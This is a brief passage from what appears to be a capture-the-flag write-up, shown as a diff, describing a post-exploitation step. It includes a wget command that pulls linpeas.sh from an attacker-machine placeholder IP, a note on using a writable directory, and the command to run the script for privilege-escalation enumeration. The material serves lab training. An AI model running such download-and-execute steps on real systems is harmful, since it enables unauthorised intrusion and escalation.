ThreatLockerIvan/ZTW24/PwnToOwn/WriteUp/Trust_Writeup.md

 wget <OUR Attacker machine IP>/linpeas.sh
 ```

+New problem, It seems that we can't write to most directory.

+But we can write to the `/temp` directory.
+Now we can download the linpeas.

 Now you can run linpeas with the following:

 ```bash
 ./linpeas.sh
 ```

 ### Manual Way